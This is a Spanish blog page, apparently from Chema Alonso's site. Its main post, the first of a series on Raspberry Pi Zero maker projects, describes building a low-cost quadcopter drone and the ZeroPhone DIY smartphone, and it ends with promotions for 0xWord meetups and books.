Y por último Fran Ramírez, que además de ser un amante de las microhistorias y aventuras de los hackers, trabaja conmigo en el equipo de Ideas Locas, y ha escrito libros sobre Docker:SecDevOps y Machine Learning aplicado a CiberSeguridad, que es una de las cosas que más le atraen. El mundo de la Inteligencia Artificial y el Hacking. Además, escribe en su blog Cyberhades.com sobre tecnología en toda su extensión.

Figura 4: III Encuentro Virtual de 0xWord con Fran Ramírez,
Pablo González, Amador Aparicio y Felipe Colorado
Todos ellos se juntaron en este III Encuentro Virtual de 0xWord para hablar de temas tan importantes como la formación en ciberseguridad, la pasión por lo que haces, como aprender hacking y el mundo de la Inteligencia Artificial. Más que recomendable para conocer sus opiniones de primera mano.


Figura 5: II Encuentro Viirtual 0xWord con Beatriz Cerrolaza, Pilar Vila y Alvaro Nuñez-Romero


Figura: 6 Encuentro Virtual de OxWord con Sergio de los Santos,
Pablo González, Fran Ramírez, Rafael Troncoso y Carlos García
Los encuentros anteriores os los dejé en otro artículo junto con la entrevista que me hicieron a mí en el podcast de "Cosas de Hackers", pero os los dejo también por aquí por si os interesa tenerlos a mano. 

Figura 7: Entrevista a Chema Alonso en "Cosas de Hackers"
por The XXLMan y José Manuel Ávalos Morer

Y para terminar, os recuerdo que durante lo que queda de mes tenéis los libros de 0xWord - incluidos los de los todos los que han participado en todos estos encuentros virtuales  - con un descuento.

Saludos Malignos!

Autor: Chema Alonso (Contactar con Chema Alonso)


jueves, abril 23, 2020

Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (1 de 3)

Desde hace ya unas semanas, desde que se declaró el estado de alarma, millones de ciudadanos de todo el mundo nos encontramos en un periodo de confinamiento por culpa del ya famoso COVID-19. Esta situación excepcional nos ha permitido pasar más tiempo con algunos de nuestros familiares más cercanos y comenzar o retomar algunos de los proyectos que teníamos olvidados por casa.

Figura 1: Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (1 de 3)

Si este es tu caso y estás buscando alguna idea interesante con la que entretenerte en esta cuarentena has llegado al sitio correcto. En esta serie de tres artículos os presentaremos a vosotros los "Makers" o los que queréis ser "Makers" alguna vez,  seis interesantes proyectos basados en la Raspberry Pi  Zero y os explicaremos cómo llevarlos a cabo.

Figura 2: Arduino para Hackers: PoCs & Hacks Just for fun
en 0xWord de Álvaro Núñez-Romero

Este articulo está hecho al más puro ejemplo del libro de 0xWord para "Makers" que hace lo mismo: Arduino para Hackers: PoCs & Hacks Just for Fun (del que además tenéis un VBOOK con sesiones en vídeo de los hacks). Además, os dejo aquí otras referencias de otros hacks hechos con Raspberry Pi y que han sido publicados en este blog.

- Raspberry Pi: Cómo construir un medidor ambiental
- Raspberry Pi: Dirtytooth para Raspberry Pi v2.0
- Raspberry Pi: Una VPN para navegar por redes WiFi con portales cautivos
- Raspberry Pi: Pi Guardian con Latch, Bots en Telegram y "ojos"
- Raspberry Pi: Latch My Carç
- Rapsberry Pi: Tu servicio VPN con OpenVPN, Latch y Virus Total
- Raspberry Pi: Latch en OpenWRT

Y ahora, vamos a por los seis proyectos que puedes hacer tú en tu casa para entretenerte y meterte en el mundo de los "makers" de una vez por todas si tenías ganas de ello.

1.- Pi Zero Drone: Drone "Low-Cost" con Raspberry Pi Zero

El primero de los proyectos de los que os hablaremos hoy se trata de la construcción de un Drone Low-Cost - por menos de 200 € - el cual se basará en una distribución de GNU/Linux y utilizara la Raspberry Pi 0 como placa controladora o cerebro. El mundo de los drones y cuadrocopteros ligeros cuenta con millones de aficionados, con Pi Zero Drone es posible acercar un poco más este mundillo a todos aquellos que quieren introducirse en la construcción de estos divertidos aparatos.

Figura 3: Pi0Drone un drone por 200 USD

Si no estás familiarizado con la construcción de drones de carreras o de cualquier otro tipo no tienes de que preocuparte, a continuación te explicaremos cuales son las piezas necesarias para este montaje y como se ensamblan pero si te gusta el mundo de los Drones, y tienes inclinaciones de "maker", puedes leer el libro de David Meléndez Calero que habla justo de estas cosas: "Hacking con Drones: Love is in the air".


Figura 4: Hacking con Drones: "Love is in the air"

Las piezas necesarias serán las siguientes: chasis, variadores, motores, hélices, batería, controladora PFX mini (69 €) y por supuesto una Raspberry Pi Zero. Lo primero será realizar el montaje del drone, este proceso es bastante sencillo y no debería llevarte más de 1 hora. Comenzaremos con el montaje de la estructura, en cada brazo del chasis hay que fijar un motor sujetándolo con tornillos (vienen con kit del chasis), a continuación se deben conectar los variadores a los motores (utilizando los cables de colores) y fijarlos en la zona central de los brazos.

Figura 5: Kit de Pi Zero Drone

Para terminar hay que situar la Raspberry Pi Zero y la controladora PFX mini en el centro del chasis, conectando ambas entre sí utilizando los pines y separadores de teflón que vienen en el kit de la controladora. Por último solo queda conectar el módulo de la batería y fíjalo a la parte inferior del chasis utilizando los velcros que te vienen con el kit. También hay que colocar una hélice en cada motor.

Figura 6: Pi Zero Drone montado

Una vez tengamos el montaje realizado pasaremos a la parte de configuración del autopilot (PFX mini + Raspberry Pi Zero), lo bueno del kit de Erle Robotics es que incluye acceso a sus imágenes Debian compatibles con la PFX mini, así que solo tendrás que guardarlas en una tarjeta micro SD e introducirla en tu Raspberry Pi Zero.

Por ultimo conectaremos el cable JST GH del módulo de alimentación a nuestro montaje de autopilot, lo que hará que al conectar la batería se encienda el drone. Ya solo nos queda conectar los variadores de cada brazo con su respectivo pin a la PFX mini (PWM1 con ESC1, PWM2 con ESC2 y sucesivamente) ya que dos de los motores giraran en sentido horario y otros dos en anti horario.


Figura 7: Cosntrucción de Pi Zero Drone paso a paso

Con el drone ya construido y listo para volar solo queda decidir qué dispositivo utilizar para controlarlo. En este caso el método más sencillo es utilizar una emisora de radio control convencional que cuente con un receptor (el cual montaremos en el drone). Tienes en la página web toda la información detallada del proyecto Pi Zero Drone con un paso a paso.

2.- Zero Phone: construcción de un Smartphone con Raspberry Pi Zero

El segundo de los proyectos del que os hablaremos hoy es la construcción de un mini teléfono móvil, sin duda un proyecto bastante interesante. En este caso la idea surgió de un proyecto de crowdfounding y sus creadores aseguran que es posible construir el smartphone por menos de 50 €.

Figura 8: Web del proyecto ZeroPhone

Este proyecto ha recibido el nombre de Zerophone, es Open Source y está basado en una distribución de GNU/Linux. Una de las mayores ventajas de construir el teléfono nosotros mismos es que nunca tendremos problemas de portabilidad o incompatibilidad con la tarjeta SIM de cualquier operadora de telecomunicaciones. Aunque el Zerophone sea un dispositivo de aspecto muy sencillo será capaz de ejecutar numerosas aplicaciones - solo GNU/Linux pone los limites -, además contará con acceso root.

En cuanto a su hardware, al basarse en una Raspberry Pi Zero este es fácil de modificar y reparar.Una vez hayas adquirido tu kit Zerophone o hayas recopilado todos los componentes necesarios solo tendrás que descargar el software gratuito y seguir paso a paso las instrucciones que encontrarás en la página web del proyecto.

Figura 9: Aspecto de Zero Phone

Si nos fijamos en sus especificaciones se podría decir que es un Smartphone bastante completo, además de contar con iluminación RGB y vibración dispone de una entrada micro HDMI, un puerto USB (de tamaño completo) y un jack de 3.5 en el que podemos conectar auriculares. También cuenta con conectividad Wi-Fi, 2G y es posible implementar BlueTooth.

Figura 10: ZeroPhone kit

En cuanto a la pantalla y teclado cuenta con una pantalla de 1,3 pulgadas y un teclado similar al de los teléfonos móviles de la década anterior. Si esta configuración no te resulta cómoda también es posible sustituir la pantalla y el teclado por una pantalla táctil de Raspberry Pi Zero. Tienes un buen análisis hecho por Javier Pastor en el blog de Xakata.

Una de las cosas que hacen bastante atractivo este proyecto es la posibilidad de conectar el dispositivo a un monitor y de utilizar teclado y ratón para controlarlo o modificar sus funciones desde su API. Si modificar el software del dispositivo no te parece suficiente también puedes personalizar por completo el hardware, es posible integrar una cámara hasta de 8 megapíxeles, nuevos botones o sensores analógicos o digitales, se puede añadir una batería más duradera, añadir distintos módulos (GPS, radio,…) o recurrir a la impresión 3D para diseñar una carcasa totalmente personalizada.


Figura 11: Puedes tener TOR en tu ZeroPhone y navegar por la Deep Web

Zerophone es una plataforma ideal para la realización de diversos proyectos, es posible utilizar cualquier lenguaje de programación en él y además permite la ejecución de APIs, scripts SSH y de consolas UART, e incluso, como se ve en la Figura 11, navegar por TOR.

Como veis son proyectos que requieren cierta maña, pero no me digáis que en lugar de estar haciendo puzzles de 1.000 piezas no es mejor estar convirtiéndote en un "maker" y jugando con el hardware y el software.

Autor: Sergio Sancho Azcoitia

***********************************************************************************
Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (1 de 3)
Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (2 de 3)
Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (3 de 3)
***********************************************************************************

Entrada destacada

ESET te consigue 100 Tempos de MyPublicInbox para consultar con los expertos de seguridad informática @eset_es @mypublicinbox1

La compañía de seguridad ESET , especializada en soluciones de seguridad personal y empresarial, ha puesto activa una campaña de concienciac...

Entradas populares